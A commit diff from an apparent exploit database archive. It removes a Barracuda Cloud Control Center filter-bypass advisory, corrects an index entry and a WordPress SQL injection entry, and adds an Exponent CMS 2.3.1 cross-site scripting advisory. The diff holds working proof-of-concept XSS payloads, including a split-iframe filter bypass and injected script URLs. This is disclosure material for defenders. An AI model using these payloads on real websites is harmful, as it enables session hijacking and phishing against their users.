Update: 2015-02-14

1 new exploits
2015-02-14 08:36:37 +00:00 · 2015-02-14 08:36:37 +00:00 · fafd87dba3
commit fafd87dba3
parent 06f9de32a2
4 changed files with 53 additions and 147 deletions
--- a/files.csv
+++ b/files.csv
@ -32352,7 +32352,7 @@ id,file,description,date,author,platform,type,port
 35897,platforms/windows/remote/35897.html,"CygniCon CyViewer ActiveX Control 'SaveData()' Insecure Method Vulnerability",2011-06-28,"High-Tech Bridge SA",windows,remote,0
 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA <= 3.13.5 File Download Security Bypass Vulnerability",2011-06-28,"Ignacio Garrido",multiple,remote,0
 35899,platforms/php/webapps/35899.txt,"Mangallam CMS - SQL Injection Web Vulnerability",2015-01-26,Vulnerability-Lab,php,webapps,0
-35900,platforms/php/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass Vulnerability",2015-01-26,Vulnerability-Lab,php,webapps,0
+35900,platforms/cgi/webapps/35900.txt,"Barracuda Networks Cloud Series - Filter Bypass Vulnerability",2015-01-26,Vulnerability-Lab,cgi,webapps,0
 35901,platforms/windows/local/35901.txt,"VLC Player 2.1.5 - DEP Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
 35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation Vulnerability",2015-01-26,"Veysel HATAS",windows,local,0
 35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus  9.0 (< Build 9031) - User Privileges Management Vulnerability",2015-01-26,"Rewterz - Research Group",jsp,webapps,0
@ -32499,3 +32499,4 @@ id,file,description,date,author,platform,type,port
 36056,platforms/windows/remote/36056.rb,"Achat v0.150 beta7 Buffer Overflow",2015-02-11,metasploit,windows,remote,9256
 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
 36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
+36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple XSS Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80
--- a/platforms/php/webapps/35900.txt
+++ b/platforms/php/webapps/35900.txt
@ -1,143 +0,0 @@
-Document Title:
-===============
-Barracuda Networks Cloud Series - Filter Bypass Vulnerability
-
-
-References (Source):
-====================
-http://www.vulnerability-lab.com/get_content.php?id=754
-
-Barracuda Networks Security ID (BNSEC): 731
-
-
-Release Date:
-=============
-2015-01-19
-
-
-Vulnerability Laboratory ID (VL-ID):
-====================================
-754
-
-
-Common Vulnerability Scoring System:
-====================================
-4.5
-
-
-Abstract Advisory Information:
-==============================
-The Vulnerability Laboratory Research Team discovered a filter bypass vulnerability in the official Barracuda Cloud Series Products.
-
-
-Vulnerability Disclosure Timeline:
-==================================
-2015-01-19:	Public Disclosure (Vulnerability Laboratory)
-
-
-Discovery Status:
-=================
-Published
-
-
-Affected Product(s):
-====================
-Barracuda Networks
-Product: Cloud Control Center 2014 Q2
-
-
-Exploitation Technique:
-=======================
-Remote
-
-
-Severity Level:
-===============
-Medium
-
-
-Technical Details & Description:
-================================
-A filter bypass vulnerability has been discovered in the official Barracuda Networks Cloud Series Appliance Applications 2014-Q1.
-The filter bypass issue allows an attacker to bypass the secure filter validation of the service to execute malicious script codes. 
-
-The barracuda filter blocks for example standard iframes, scripts and other invalid code context: The cloud service has a own exception-handling 
-to parse or encode malicious injected web context. The mechanism filters the first request and sanitizes the output in every input field.
-
-During a pentest we injected a standard iframe to check and provoke the validation. The frame got blocked! In the next step the attacker splits (%20%20%20) 
-the request and injects at the end an onload frame to an external malicious source. The second iframe with the onload alert executes the script codes after 
-the validation encoded only the first script code tag. The second script code tag can bypass the applicance filter mechanism and executes in the web context 
-of affected modules. The secure validation does not recognize a splitted request which results in client-side and application-side script code execution in 
-the cloud series products.
-
-The security risk of the filter bypass vulnerability is estimated as medium and the cvss (common vulnerability scoring system) count is 4.5 (medium). 
-Exploitation of the filter bypass vulnerability requires a low privileged application user account with restricted access and low user interaction. 
-Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation 
-of affected or connected module context.
-
-Vulnerable Request Method(s):
-				[+] POST & GET
-
-
-Proof of Concept (PoC):
-=======================
-The filter bypass web vulnerability can be exploited by local privileged user accounts and remote attackers with low or medium user interaction. 
-For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
-
-PoC: 
-<iframe src=a>%20%20%20%20\"><iframe src=http://vuln-lab.com onload=alert("VL") <
-
-PoC: 
-<script language=JavaScript>m='%3Ciframe%20src%3Da%3E%2520%2520%2520%2520%5C%22%3E%3Ciframe%20src%3Dhttp%3A//vuln-lab.com%20onload%3Dalert%28%22VL%22%29%20%3C';d=unescape(m);document.write(d);</script>
-
-
-Solution - Fix & Patch:
-=======================
-The issue can be patched by a secure validation of the full message input body context of any input or request method attempt.
-Ensure that the validaton does not only encode the first injected script code since a empty char arrives. Filter all web context 
-that runs through the requesting procedure and parse separatly to prevent script code injection attacks.
-
-Note: Barracuda Networks patched the vulnerability and acknowledged the researcher. Updates are available in Barracuda Labs and the Customer Service.
-
-
-Security Risk:
-==============
-The security risk of the filter bypass web vulnerability in the barracuda cloud product series is estimated as medium. (CVSS 4.5)
-
-
-Credits & Authors:
-==================
-Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
-
-
-Disclaimer & Information:
-=========================
-The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
-or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
-in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
-or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
-consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
-policies, deface websites, hack into databases or trade with fraud/stolen material.
-
-Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
-Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
-Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
-Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
-Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
-Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
-
-Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
-electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
-Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
-is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
-(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
-
-				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
-
-- 
-VULNERABILITY LABORATORY - RESEARCH TEAM
-SERVICE: www.vulnerability-lab.com
-CONTACT: research@vulnerability-lab.com
-PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
-
-
--- a/platforms/php/webapps/36058.txt
+++ b/platforms/php/webapps/36058.txt
@ -1,6 +1,6 @@
-?######################
+######################

-# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerabilitiey
+# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerability

 # Exploit Author : Claudio Viviani

@ -40,7 +40,7 @@ http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]

 #####################

-# Fix/patch sended by apptha's developer
+# Fix/patch sent by apptha's developer

 File: videogalleryrss.php

--- a/platforms/php/webapps/36059.txt
+++ b/platforms/php/webapps/36059.txt
@ -0,0 +1,48 @@
+######################
+# Exploit Title: Multiple Exponent CMS Cross-Site Scripting Vulnerabilies
+# Discovered by-
+# Mayuresh Dani (mdani@qualys.com)
+# Narendra Shinde (nshinde@qualys.com)
+# Vendor Homepage: http://www.exponentcms.org/
+# Software Link:
+http://sourceforge.net/projects/exponentcms/files/exponent-2.3.1.zip/download
+# Version: 2.3.1
+# Date: 2014-10-11
+# Tested on: Windows 7 / Mozilla Firefox
+#            Ubuntu 14.04 / Mozilla Firefox
+# CVE: CVE-2014-8690
+######################
+# Vulnerability Disclosure Timeline:
+# 2014-11-04:  Discovered vulnerability
+# 2014-11-04:  Vendor Notification
+# 2014-11-05:  Vendor confirmation
+# 2014-11-06:  Vendor fixes Universal XSS -
+http://www.exponentcms.org/news/security-patch-released-for-v2-1-4-v2-2-3-and-v2-3-0
+# 2015-02-12:  Public Disclosure
+######################
+# Description
+# Exponent CMS is a free, open source, open standards modular enterprise
+software framework and content management system (CMS) written in the PHP.
+#
+# CVE-2014-8690:
+# Universal XSS - Exponent CMS builds the canonical path field from an
+unsanitized URL, which can be used to execute arbitrary scripts.
+# Examples:
+#
+http://server/news/show/title/time-for-a-heavy-harvest-new-release/src/%22%3E%3Cscript%3Ealert%287%29%3C/script%3E@random4cd201e063d5c
+#
+http://server/news/show/title/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Etime-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
+#
+http://server/news/%22%3E%3Cscript%3Ealert%287%29%3C/script%3Eshow/title/time-for-a-heavy-harvest-new-release/src/@random4cd201e063d5c
+#
+# 2.b. XSS in user profiles.
+# The "First Name" and "Last Name" fields on
+http://server/exponent/users/edituser are not sufficiently sanitized. Enter
+your favourite script and the application will execute it everytime for you.
+#
+# More information and PoCs -
+http://exponentcms.lighthouseapp.com/projects/61783/tickets/1230-universal-cross-site-scripting-in-exponent-cms-231-and-prior
+#
+#
+# Thanks,
+# Mayuresh & Narendra